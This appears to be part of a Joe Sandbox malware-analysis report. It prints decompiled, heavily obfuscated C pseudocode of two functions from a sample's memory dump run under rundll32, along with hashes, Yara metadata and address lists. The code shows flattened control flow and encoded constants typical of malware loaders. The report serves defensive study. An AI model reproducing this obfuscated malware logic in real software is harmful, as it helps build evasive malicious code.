                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-3792513126
                                                                                                                      • Opcode ID: 3a74917b39747dd03601a38dd5ba4ec860f38957374910bb7bd73188a47e716f
                                                                                                                      • Instruction ID: aa3b6bca8d0a32514e43cb57393a4bb27a0cb669a7e6182c363d0da140d45b42
                                                                                                                      • Opcode Fuzzy Hash: 3a74917b39747dd03601a38dd5ba4ec860f38957374910bb7bd73188a47e716f
                                                                                                                      • Instruction Fuzzy Hash: 1B022272D0031DDBCF69CFA1C98A9EEBBB1FB04314F208159E516BA264D7B45A89CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00352753 Relevance: 10.2, Strings: 8, Instructions: 239COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00352753(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				unsigned int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				void* _t233;
				void* _t246;
				intOrPtr _t251;
				intOrPtr* _t252;
				void* _t253;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				intOrPtr _t280;
				void* _t281;
				void* _t285;
				signed int* _t286;

				_t252 = __ecx;
				_t286 =  &_v232;
				_v172 = __ecx;
				_v136 = _v136 & 0x00000000;
				_v132 = _v132 & 0x00000000;
				_v140 = 0x217d3d;
				_v176 = 0xa426f0;
				_v176 = _v176 + 0xffffeb7e;
				_v176 = _v176 ^ 0xed8cc375;
				_v176 = _v176 ^ 0xed273dc0;
				_v220 = 0x3129fd;
				_v220 = _v220 + 0xffff6602;
				_v220 = _v220 + 0xfffff7e7;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000cbf49;
				_v212 = 0x151fab;
				_v212 = _v212 + 0x7196;
				_v212 = _v212 + 0xffffb9ae;
				_v212 = _v212 * 0x34;
				_t281 = 0x42637f8;
				_v212 = _v212 ^ 0x045541a5;
				_v148 = 0x54413c;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x0a8ad6a3;
				_v180 = 0x7a2f9c;
				_t276 = 0x52;
				_v180 = _v180 / _t276;
				_t277 = 0x3b;
				_v180 = _v180 * 0x43;
				_v180 = _v180 ^ 0x006060ee;
				_v144 = 0xa6782c;
				_v144 = _v144 + 0x5cb5;
				_v144 = _v144 ^ 0x00a488c7;
				_v228 = 0xec9e27;
				_v228 = _v228 >> 0x10;
				_v228 = _v228 * 0x57;
				_v228 = _v228 * 0x1a;
				_v228 = _v228 ^ 0x00091e6b;
				_v164 = 0xea1f52;
				_v164 = _v164 >> 6;
				_v164 = _v164 ^ 0x000e8f9b;
				_v168 = 0xaa796a;
				_v168 = _v168 << 9;
				_v168 = _v168 << 1;
				_v168 = _v168 ^ 0xa9e52790;
				_v232 = 0xe004fa;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x9f2834c7;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xac158818;
				_v152 = 0x480a21;
				_v152 = _v152 >> 0xa;
				_v152 = _v152 ^ 0x00051613;
				_v192 = 0xe4ba17;
				_v192 = _v192 << 0xc;
				_v192 = _v192 + 0xffffee51;
				_v192 = _v192 * 0x26;
				_v192 = _v192 ^ 0x39f6006f;
				_v184 = 0xc14080;
				_v184 = _v184 + 0xffffa387;
				_v184 = _v184 / _t277;
				_v184 = _v184 ^ 0x000e78de;
				_v224 = 0xaafc1b;
				_v224 = _v224 << 8;
				_v224 = _v224 | 0xe68448c7;
				_v224 = _v224 + 0xffffb5fa;
				_v224 = _v224 ^ 0xeef4be14;
				_v208 = 0x4cb450;
				_v208 = _v208 | 0x41a678b0;
				_v208 = _v208 << 3;
				_v208 = _v208 + 0xffff1daa;
				_v208 = _v208 ^ 0x0f7f4e1f;
				_v156 = 0xa14600;
				_v156 = _v156 | 0x4ac9cb75;
				_v156 = _v156 ^ 0x4ae3fffe;
				_v200 = 0x80f125;
				_v200 = _v200 >> 6;
				_v200 = _v200 + 0xa5;
				_v200 = _v200 + 0x7126;
				_v200 = _v200 ^ 0x0003bf81;
				_v216 = 0xe3f3ee;
				_v216 = _v216 ^ 0x7171deb4;
				_v216 = _v216 ^ 0xe1685078;
				_v216 = _v216 >> 0xf;
				_v216 = _v216 ^ 0x000d439d;
				_v188 = 0x120f5;
				_v188 = _v188 + 0x596b;
				_t152 =  &_v188; // 0x596b
				_t278 = 0x32;
				_v188 =  *_t152 * 0x15;
				_t251 = _v172;
				_v188 = _v188 / _t278;
				_v188 = _v188 ^ 0x0000a7a1;
				_v160 = 0xd711e5;
				_v160 = _v160 | 0x35682df8;
				_v160 = _v160 ^ 0x35f32f5b;
				_v196 = 0xd874e4;
				_t279 = 0x21;
				_t280 = _v172;
				_v196 = _v196 / _t279;
				_v196 = _v196 + 0xffffe729;
				_v196 = _v196 + 0xffff68b4;
				_v196 = _v196 ^ 0x0004b076;
				_v204 = 0xe57f56;
				_v204 = _v204 ^ 0xa54f8096;
				_v204 = _v204 + 0xc8c2;
				_v204 = _v204 + 0xffffef22;
				_v204 = _v204 ^ 0xa5a4489c;
				while(1) {
					L1:
					_t233 = 0xe70005f;
					do {
						while(_t281 != 0x42637f8) {
							if(_t281 == 0x44a4c11) {
								_t285 = E0034EF71(1, 0x10);
								_push(_t285);
								_push(_v148);
								_push( &_v128);
								_t253 = 0xb;
								E00345A07(_t253, _v212);
								_t286 =  &(_t286[5]);
								_t281 = 0x5b07f93;
								goto L9;
							} else {
								if(_t281 == 0x5b07f93) {
									_t280 = E0035C9A9(_v144, _v228,  *_t252, _v164,  *((intOrPtr*)(_t252 + 4)));
									_t286 =  &(_t286[4]);
									__eflags = _t280;
									if(__eflags != 0) {
										_t281 = 0xc9ed25e;
										goto L9;
									}
								} else {
									if(_t281 == 0xc9ed25e) {
										_t285 = 0x4000;
										_push(_t252);
										_push(_t252);
										_t251 = E00353512(0x4000);
										__eflags = _t251;
										_t233 = 0xe70005f;
										_t252 = _v172;
										_t281 =  !=  ? 0xe70005f : 0xdfcaecd;
										continue;
									} else {
										if(_t281 == 0xdfcaecd) {
											E003468DE(_v188, _v160, _v196, _v204, _t280);
										} else {
											_t295 = _t281 - _t233;
											if(_t281 != _t233) {
												goto L15;
											} else {
												_push(_v208);
												_push(_v224);
												_push(0x34136c);
												_t246 = E0034AB66(_v192, _v184, _t295);
												_push(_t280);
												_push( &_v128);
												_push(_t246);
												_push(_t285);
												_push(_t251);
												 *((intOrPtr*)(E0034C1DC(_v192, 0xbf7d08b0, 0xef)))();
												E0034AE03(_v156, _v200, _v216, _t246);
												_t286 =  &(_t286[0xa]);
												_t281 = 0xdfcaecd;
												L9:
												_t252 = _v172;
												goto L1;
											}
										}
									}
								}
							}
							L18:
							return _t251;
						}
						_t281 = 0x44a4c11;
						L15:
						__eflags = _t281 - 0xefc9c40;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                      0x00352753
                                                                                                                      0x00352753
                                                                                                                      0x0035275d
                                                                                                                      0x00352761
                                                                                                                      0x00352768
                                                                                                                      0x0035276d
                                                                                                                      0x00352775
                                                                                                                      0x0035277d
                                                                                                                      0x00352785
                                                                                                                      0x0035278d
                                                                                                                      0x00352795
                                                                                                                      0x0035279d
                                                                                                                      0x003527a5
                                                                                                                      0x003527ad
                                                                                                                      0x003527b2
                                                                                                                      0x003527ba
                                                                                                                      0x003527c2
                                                                                                                      0x003527ca
                                                                                                                      0x003527d7
                                                                                                                      0x003527db
                                                                                                                      0x003527e0
                                                                                                                      0x003527e8
                                                                                                                      0x003527f0
                                                                                                                      0x003527f5
                                                                                                                      0x003527fd
                                                                                                                      0x0035280b
                                                                                                                      0x00352810
                                                                                                                      0x0035281b
                                                                                                                      0x0035281c
                                                                                                                      0x00352820
                                                                                                                      0x00352828
                                                                                                                      0x00352830
                                                                                                                      0x00352838
                                                                                                                      0x00352840
                                                                                                                      0x00352848
                                                                                                                      0x00352852
                                                                                                                      0x0035285b
                                                                                                                      0x0035285f
                                                                                                                      0x00352867
                                                                                                                      0x0035286f
                                                                                                                      0x00352874
                                                                                                                      0x0035287c
                                                                                                                      0x00352884
                                                                                                                      0x00352889
                                                                                                                      0x0035288d
                                                                                                                      0x00352895
                                                                                                                      0x0035289d
                                                                                                                      0x003528a1
                                                                                                                      0x003528a9
                                                                                                                      0x003528ae
                                                                                                                      0x003528b6
                                                                                                                      0x003528be
                                                                                                                      0x003528c3
                                                                                                                      0x003528cb
                                                                                                                      0x003528d3
                                                                                                                      0x003528d8
                                                                                                                      0x003528e5
                                                                                                                      0x003528e9
                                                                                                                      0x003528f1
                                                                                                                      0x003528f9
                                                                                                                      0x00352907
                                                                                                                      0x0035290b
                                                                                                                      0x00352913
                                                                                                                      0x0035291b
                                                                                                                      0x00352920
                                                                                                                      0x00352928
                                                                                                                      0x00352930
                                                                                                                      0x0035293a
                                                                                                                      0x00352942
                                                                                                                      0x0035294a
                                                                                                                      0x0035294f
                                                                                                                      0x00352957
                                                                                                                      0x0035295f
                                                                                                                      0x00352967
                                                                                                                      0x0035296f
                                                                                                                      0x00352977
                                                                                                                      0x0035297f
                                                                                                                      0x00352984
                                                                                                                      0x0035298c
                                                                                                                      0x00352994
                                                                                                                      0x0035299c
                                                                                                                      0x003529a4
                                                                                                                      0x003529ac
                                                                                                                      0x003529b4
                                                                                                                      0x003529b9
                                                                                                                      0x003529c1
                                                                                                                      0x003529c9
                                                                                                                      0x003529d1
                                                                                                                      0x003529d8
                                                                                                                      0x003529df
                                                                                                                      0x003529eb
                                                                                                                      0x003529ef
                                                                                                                      0x003529f3
                                                                                                                      0x003529fb
                                                                                                                      0x00352a03
                                                                                                                      0x00352a0b
                                                                                                                      0x00352a13
                                                                                                                      0x00352a1f
                                                                                                                      0x00352a22
                                                                                                                      0x00352a26
                                                                                                                      0x00352a2a
                                                                                                                      0x00352a32
                                                                                                                      0x00352a3a
                                                                                                                      0x00352a42
                                                                                                                      0x00352a4a
                                                                                                                      0x00352a52
                                                                                                                      0x00352a5a
                                                                                                                      0x00352a62
                                                                                                                      0x00352a6a
                                                                                                                      0x00352a6a
                                                                                                                      0x00352a6a
                                                                                                                      0x00352a6f
                                                                                                                      0x00352a6f
                                                                                                                      0x00352a81
                                                                                                                      0x00352b7d
                                                                                                                      0x00352b86
                                                                                                                      0x00352b87
                                                                                                                      0x00352b8f
                                                                                                                      0x00352b92
                                                                                                                      0x00352b93
                                                                                                                      0x00352b98
                                                                                                                      0x00352b9b
                                                                                                                      0x00000000
                                                                                                                      0x00352a87
                                                                                                                      0x00352a8d
                                                                                                                      0x00352b5c
                                                                                                                      0x00352b5e
                                                                                                                      0x00352b61
                                                                                                                      0x00352b63
                                                                                                                      0x00352b65
                                                                                                                      0x00000000
                                                                                                                      0x00352b65
                                                                                                                      0x00352a93
                                                                                                                      0x00352a99
                                                                                                                      0x00352b10
                                                                                                                      0x00352b1d
                                                                                                                      0x00352b1e
                                                                                                                      0x00352b26
                                                                                                                      0x00352b2e
                                                                                                                      0x00352b30
                                                                                                                      0x00352b36
                                                                                                                      0x00352b3a
                                                                                                                      0x00000000
                                                                                                                      0x00352a9b
                                                                                                                      0x00352aa1
                                                                                                                      0x00352bc9
                                                                                                                      0x00352aa7
                                                                                                                      0x00352aa7
                                                                                                                      0x00352aa9
                                                                                                                      0x00000000
                                                                                                                      0x00352aaf
                                                                                                                      0x00352aaf
                                                                                                                      0x00352ab3
                                                                                                                      0x00352abf
                                                                                                                      0x00352ac4
                                                                                                                      0x00352ad7
                                                                                                                      0x00352ad8
                                                                                                                      0x00352ad9
                                                                                                                      0x00352ada
                                                                                                                      0x00352adb
                                                                                                                      0x00352ae7
                                                                                                                      0x00352af6
                                                                                                                      0x00352afb
                                                                                                                      0x00352afe
                                                                                                                      0x00352b03
                                                                                                                      0x00352b03
                                                                                                                      0x00000000
                                                                                                                      0x00352b03
                                                                                                                      0x00352aa9
                                                                                                                      0x00352aa1
                                                                                                                      0x00352a99
                                                                                                                      0x00352a8d
                                                                                                                      0x00352bd4
                                                                                                                      0x00352bdd
                                                                                                                      0x00352bdd
                                                                                                                      0x00352ba5
                                                                                                                      0x00352baa
                                                                                                                      0x00352baa
                                                                                                                      0x00352baa
                                                                                                                      0x00000000
                                                                                                                      0x00352bb6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !H$&q$<AT$=}!$kYo$o$xPh$``
                                                                                                                      • API String ID: 0-1374268856
                                                                                                                      • Opcode ID: dc30288d57a8d801b7739fa51317af9a9f67c28cad635ada22e8cedb4920697f
                                                                                                                      • Instruction ID: 4046120bc93aa00def48b90666c00b3c4c49b52c0d4a309b34cc982da045d647
                                                                                                                      • Opcode Fuzzy Hash: dc30288d57a8d801b7739fa51317af9a9f67c28cad635ada22e8cedb4920697f
                                                                                                                      • Instruction Fuzzy Hash: E6B120729083809FD355CE29C48A90BFBF0BBD5758F104A2DF9A696260D3B5D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035A429 Relevance: 9.1, Strings: 7, Instructions: 389COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0035A429(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t471;
				signed int _t488;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t503;
				void* _t552;
				void* _t553;
				signed int _t556;
				signed int* _t558;

				_t558 =  &_v2792;
				_v2604 = _v2604 & 0x00000000;
				_v2616 = 0xa4b63e;
				_v2612 = 0x1047f0;
				_v2608 = 0x380de4;
				_v2640 = 0x3665dd;
				_v2640 = _v2640 >> 1;
				_v2640 = _v2640 ^ 0x001b32c7;
				_v2748 = 0xd91e11;
				_v2748 = _v2748 + 0xffffc541;
				_v2748 = _v2748 ^ 0x51c605c4;
				_v2748 = _v2748 ^ 0x6a8dd901;
				_v2748 = _v2748 ^ 0x3b9e7a9b;
				_v2788 = 0x157b94;
				_v2788 = _v2788 + 0xffffeadc;
				_v2788 = _v2788 >> 0x10;
				_v2788 = _v2788 + 0xffff73d6;
				_v2788 = _v2788 ^ 0xffff2eba;
				_v2716 = 0x64154b;
				_v2716 = _v2716 * 0x75;
				_t552 = __ecx;
				_v2716 = _v2716 << 3;
				_t553 = 0x422d362;
				_v2716 = _v2716 ^ 0x6de46b99;
				_v2720 = 0x9c58cd;
				_v2720 = _v2720 + 0xffff09d2;
				_v2720 = _v2720 + 0x2545;
				_v2720 = _v2720 ^ 0x00913431;
				_v2688 = 0xaeb597;
				_v2688 = _v2688 ^ 0x90c85188;
				_t556 = 0x69;
				_v2688 = _v2688 / _t556;
				_v2688 = _v2688 ^ 0x016f083f;
				_v2624 = 0xf336a7;
				_v2624 = _v2624 ^ 0x0756d720;
				_v2624 = _v2624 ^ 0x07af532c;
				_v2780 = 0x2eb910;
				_v2780 = _v2780 + 0xffff6a34;
				_v2780 = _v2780 + 0x3a3b;
				_v2780 = _v2780 >> 0xc;
				_v2780 = _v2780 ^ 0x00093eda;
				_v2696 = 0x95c01d;
				_v2696 = _v2696 ^ 0xd4af9b47;
				_t488 = 0x43;
				_v2696 = _v2696 * 0x38;
				_v2696 = _v2696 ^ 0x6cc3512a;
				_v2756 = 0x7bda8f;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 + 0xffff790e;
				_v2756 = _v2756 << 1;
				_v2756 = _v2756 ^ 0x00077f92;
				_v2672 = 0xbe500a;
				_v2672 = _v2672 * 0x69;
				_v2672 = _v2672 ^ 0x4e081773;
				_v2664 = 0xf21545;
				_v2664 = _v2664 << 1;
				_v2664 = _v2664 ^ 0x01e0a5ee;
				_v2712 = 0x4aa3d0;
				_v2712 = _v2712 / _t488;
				_v2712 = _v2712 + 0xffffba00;
				_v2712 = _v2712 ^ 0x00096837;
				_v2704 = 0x6e8851;
				_v2704 = _v2704 * 0x4c;
				_v2704 = _v2704 ^ 0x74892048;
				_v2704 = _v2704 ^ 0x54501412;
				_v2740 = 0x9704ff;
				_t491 = 0x4c;
				_v2740 = _v2740 / _t491;
				_v2740 = _v2740 + 0xffff50cb;
				_v2740 = _v2740 / _t556;
				_v2740 = _v2740 ^ 0x0004486b;
				_v2772 = 0xa165e2;
				_t492 = 0x36;
				_v2772 = _v2772 / _t492;
				_v2772 = _v2772 ^ 0x6089554b;
				_t493 = 0x29;
				_v2772 = _v2772 * 0x30;
				_v2772 = _v2772 ^ 0x1a2b5067;
				_v2680 = 0xe9519d;
				_v2680 = _v2680 / _t493;
				_v2680 = _v2680 | 0xd8f73a5a;
				_v2680 = _v2680 ^ 0xd8f0b3ca;
				_v2656 = 0x3fe983;
				_t494 = 0x30;
				_v2656 = _v2656 / _t494;
				_v2656 = _v2656 ^ 0x00046ac2;
				_v2628 = 0x33b4cd;
				_t495 = 0x11;
				_v2628 = _v2628 / _t495;
				_v2628 = _v2628 ^ 0x00043067;
				_v2648 = 0x47920b;
				_t496 = 0x1a;
				_v2648 = _v2648 * 7;
				_v2648 = _v2648 ^ 0x01f55662;
				_v2636 = 0xc27dad;
				_v2636 = _v2636 | 0xeea2905e;
				_v2636 = _v2636 ^ 0xeee70f52;
				_v2792 = 0xce83a7;
				_v2792 = _v2792 | 0x91097b86;
				_v2792 = _v2792 >> 0x10;
				_v2792 = _v2792 + 0xfffff873;
				_v2792 = _v2792 ^ 0x000d88b9;
				_v2764 = 0x687458;
				_v2764 = _v2764 + 0xffff3130;
				_v2764 = _v2764 / _t488;
				_v2764 = _v2764 | 0xf90624cd;
				_v2764 = _v2764 ^ 0xf90653f7;
				_v2784 = 0xf92951;
				_v2784 = _v2784 + 0xffff51be;
				_v2784 = _v2784 ^ 0x8ae9764d;
				_v2784 = _v2784 + 0x99a0;
				_v2784 = _v2784 ^ 0x8a16d001;
				_v2732 = 0xd5993f;
				_v2732 = _v2732 / _t496;
				_v2732 = _v2732 + 0xffff4990;
				_v2732 = _v2732 ^ 0x000978e2;
				_v2724 = 0xcf1521;
				_v2724 = _v2724 >> 2;
				_v2724 = _v2724 << 0xa;
				_v2724 = _v2724 ^ 0xcf1adb57;
				_v2728 = 0xc9d07f;
				_v2728 = _v2728 + 0xffff241f;
				_v2728 = _v2728 + 0xffff5e1a;
				_v2728 = _v2728 ^ 0x00c03f16;
				_v2632 = 0x51b7a0;
				_t497 = 0xd;
				_v2632 = _v2632 / _t497;
				_v2632 = _v2632 ^ 0x0003c006;
				_v2768 = 0xdee1c4;
				_t498 = 0x72;
				_v2768 = _v2768 * 0x4b;
				_v2768 = _v2768 ^ 0x45bd8e4b;
				_v2768 = _v2768 + 0x810;
				_v2768 = _v2768 ^ 0x04f5c4f4;
				_v2620 = 0x673f5;
				_v2620 = _v2620 / _t498;
				_v2620 = _v2620 ^ 0x0006a8dc;
				_v2776 = 0xc1ae10;
				_t499 = 0x5a;
				_v2776 = _v2776 * 0x5d;
				_v2776 = _v2776 / _t499;
				_t500 = 0x7a;
				_v2776 = _v2776 / _t500;
				_v2776 = _v2776 ^ 0x0000f358;
				_v2668 = 0x9bfbd0;
				_v2668 = _v2668 * 0x2e;
				_v2668 = _v2668 ^ 0x1c042184;
				_v2700 = 0xcd0c2b;
				_v2700 = _v2700 >> 8;
				_v2700 = _v2700 + 0xfffff064;
				_v2700 = _v2700 ^ 0x0007642a;
				_v2708 = 0x1a6cb4;
				_v2708 = _v2708 ^ 0x57f593cf;
				_v2708 = _v2708 | 0x44881231;
				_v2708 = _v2708 ^ 0x57eba098;
				_v2752 = 0xd7110a;
				_v2752 = _v2752 / _t556;
				_v2752 = _v2752 << 0xe;
				_v2752 = _v2752 + 0xffff1365;
				_v2752 = _v2752 ^ 0x83185000;
				_v2760 = 0xc45920;
				_v2760 = _v2760 + 0xffffdf34;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xfa48;
				_v2760 = _v2760 ^ 0x00031526;
				_v2652 = 0x3af3c9;
				_v2652 = _v2652 << 0xf;
				_v2652 = _v2652 ^ 0x79efd05d;
				_v2660 = 0x38b4f1;
				_v2660 = _v2660 ^ 0x7076ccd1;
				_v2660 = _v2660 ^ 0x704b934c;
				_v2744 = 0x6269bc;
				_v2744 = _v2744 | 0xfa5eccfb;
				_v2744 = _v2744 * 0x5f;
				_v2744 = _v2744 << 0xe;
				_v2744 = _v2744 ^ 0x9469f4ee;
				_v2676 = 0x941055;
				_v2676 = _v2676 | 0xfd7f72ef;
				_v2676 = _v2676 ^ 0xfdfef17e;
				_v2684 = 0x7199f;
				_v2684 = _v2684 + 0x9aa9;
				_v2684 = _v2684 << 0xe;
				_v2684 = _v2684 ^ 0xed16f6de;
				_v2644 = 0xf4560;
				_v2644 = _v2644 * 0x1c;
				_v2644 = _v2644 ^ 0x01a06f93;
				_v2692 = 0x891e84;
				_v2692 = _v2692 ^ 0x46454346;
				_v2692 = _v2692 | 0x068a2534;
				_v2692 = _v2692 ^ 0x46ca9877;
				_v2736 = 0x29dfc8;
				_t471 = _v2736 * 0x19;
				_v2736 = _t471;
				_v2736 = _v2736 | 0x3d4578d3;
				_v2736 = _v2736 >> 4;
				_v2736 = _v2736 ^ 0x03d45238;
				while(_t553 != 0x2953b22) {
					if(_t553 == 0x422d362) {
						_t553 = 0xe704baa;
						continue;
					} else {
						_t565 = _t553 - 0xe704baa;
						if(_t553 != 0xe704baa) {
							L8:
							__eflags = _t553 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E003612A8(_t500, _v2748, _t565, _v2788, _v2716,  &_v2600);
							 *((short*)(E00354FA8(_v2720,  &_v2600, _v2688, _v2624))) = 0;
							E00348650(_v2780,  &_v1560, _t565, _v2696);
							_push(_v2712);
							_push(_v2664);
							_push(0x34181c);
							E0034E7CE(E0034AB66(_v2756, _v2672, _t565), _t565, _v2704,  &_v2600, _v2756, _v2740, _v2772, _v2680, _v2656,  &_v1560);
							E0034AE03(_v2628, _v2648, _v2636, _t483);
							_t500 = _v2792;
							_t471 = E0035C38F(_t500,  &_v2080, _t552, _v2764);
							_t558 =  &(_t558[0x15]);
							if(_t471 != 0) {
								_t553 = 0x2953b22;
								continue;
							}
						}
					}
					return _t471;
				}
				_push(_t500);
				E0034EA7B( &_v1040, _v2784, _v2640, _t500, _v2732, _v2724, _v2728);
				_push(_v2776);
				_push(_v2620);
				_push(0x34185c);
				E0034E7CE(E0034AB66(_v2632, _v2768, __eflags), __eflags, _v2668,  &_v1040, _v2632, _v2700, _v2708, _v2752, _v2760,  &_v2080);
				_t503 = _v2652;
				E0034AE03(_t503, _v2660, _v2744, _t473);
				__eflags = 0;
				_push(_v2736);
				_push(_v2692);
				_push(_v2644);
				_push(0);
				_push(0);
				_push(_v2684);
				_push(_t503);
				_push(0);
				_t500 =  &_v520;
				_t471 = E00349700(_t500, _v2676, 0);
				_t558 =  &(_t558[0x1c]);
				_t553 = 0x740d40c;
				goto L8;
			}









































































                                                                                                                      0x0035a429
                                                                                                                      0x0035a42f
                                                                                                                      0x0035a439
                                                                                                                      0x0035a444
                                                                                                                      0x0035a44f
                                                                                                                      0x0035a45a
                                                                                                                      0x0035a465
                                                                                                                      0x0035a46c
                                                                                                                      0x0035a477
                                                                                                                      0x0035a47f
                                                                                                                      0x0035a487
                                                                                                                      0x0035a48f
                                                                                                                      0x0035a497
                                                                                                                      0x0035a49f
                                                                                                                      0x0035a4a7
                                                                                                                      0x0035a4af
                                                                                                                      0x0035a4b4
                                                                                                                      0x0035a4bc
                                                                                                                      0x0035a4c4
                                                                                                                      0x0035a4d5
                                                                                                                      0x0035a4d9
                                                                                                                      0x0035a4db
                                                                                                                      0x0035a4e0
                                                                                                                      0x0035a4e5
                                                                                                                      0x0035a4ed
                                                                                                                      0x0035a4f5
                                                                                                                      0x0035a4fd
                                                                                                                      0x0035a505
                                                                                                                      0x0035a50d
                                                                                                                      0x0035a515
                                                                                                                      0x0035a523
                                                                                                                      0x0035a528
                                                                                                                      0x0035a52e
                                                                                                                      0x0035a536
                                                                                                                      0x0035a541
                                                                                                                      0x0035a54c
                                                                                                                      0x0035a557
                                                                                                                      0x0035a55f
                                                                                                                      0x0035a567
                                                                                                                      0x0035a56f
                                                                                                                      0x0035a574
                                                                                                                      0x0035a57c
                                                                                                                      0x0035a584
                                                                                                                      0x0035a591
                                                                                                                      0x0035a592
                                                                                                                      0x0035a596
                                                                                                                      0x0035a59e
                                                                                                                      0x0035a5a6
                                                                                                                      0x0035a5ab
                                                                                                                      0x0035a5b3
                                                                                                                      0x0035a5b7
                                                                                                                      0x0035a5bf
                                                                                                                      0x0035a5d2
                                                                                                                      0x0035a5d9
                                                                                                                      0x0035a5e4
                                                                                                                      0x0035a5ef
                                                                                                                      0x0035a5f6
                                                                                                                      0x0035a601
                                                                                                                      0x0035a60f
                                                                                                                      0x0035a613
                                                                                                                      0x0035a61b
                                                                                                                      0x0035a623
                                                                                                                      0x0035a630
                                                                                                                      0x0035a634
                                                                                                                      0x0035a63c
                                                                                                                      0x0035a644
                                                                                                                      0x0035a654
                                                                                                                      0x0035a659
                                                                                                                      0x0035a65d
                                                                                                                      0x0035a66d
                                                                                                                      0x0035a671
                                                                                                                      0x0035a679
                                                                                                                      0x0035a687
                                                                                                                      0x0035a68c
                                                                                                                      0x0035a690
                                                                                                                      0x0035a69f
                                                                                                                      0x0035a6a2
                                                                                                                      0x0035a6a6
                                                                                                                      0x0035a6ae
                                                                                                                      0x0035a6c4
                                                                                                                      0x0035a6cb
                                                                                                                      0x0035a6d6
                                                                                                                      0x0035a6e1
                                                                                                                      0x0035a6f3
                                                                                                                      0x0035a6f8
                                                                                                                      0x0035a6ff
                                                                                                                      0x0035a70a
                                                                                                                      0x0035a71e
                                                                                                                      0x0035a723
                                                                                                                      0x0035a72a
                                                                                                                      0x0035a735
                                                                                                                      0x0035a74a
                                                                                                                      0x0035a74b
                                                                                                                      0x0035a752
                                                                                                                      0x0035a75d
                                                                                                                      0x0035a768
                                                                                                                      0x0035a773
                                                                                                                      0x0035a77e
                                                                                                                      0x0035a786
                                                                                                                      0x0035a78e
                                                                                                                      0x0035a793
                                                                                                                      0x0035a79b
                                                                                                                      0x0035a7a3
                                                                                                                      0x0035a7ab
                                                                                                                      0x0035a7bb
                                                                                                                      0x0035a7bf
                                                                                                                      0x0035a7c7
                                                                                                                      0x0035a7cf
                                                                                                                      0x0035a7d7
                                                                                                                      0x0035a7df
                                                                                                                      0x0035a7e7
                                                                                                                      0x0035a7ef
                                                                                                                      0x0035a7f7
                                                                                                                      0x0035a805
                                                                                                                      0x0035a809
                                                                                                                      0x0035a811
                                                                                                                      0x0035a81b
                                                                                                                      0x0035a823
                                                                                                                      0x0035a828
                                                                                                                      0x0035a82d
                                                                                                                      0x0035a835
                                                                                                                      0x0035a83d
                                                                                                                      0x0035a845
                                                                                                                      0x0035a84d
                                                                                                                      0x0035a855
                                                                                                                      0x0035a869
                                                                                                                      0x0035a86e
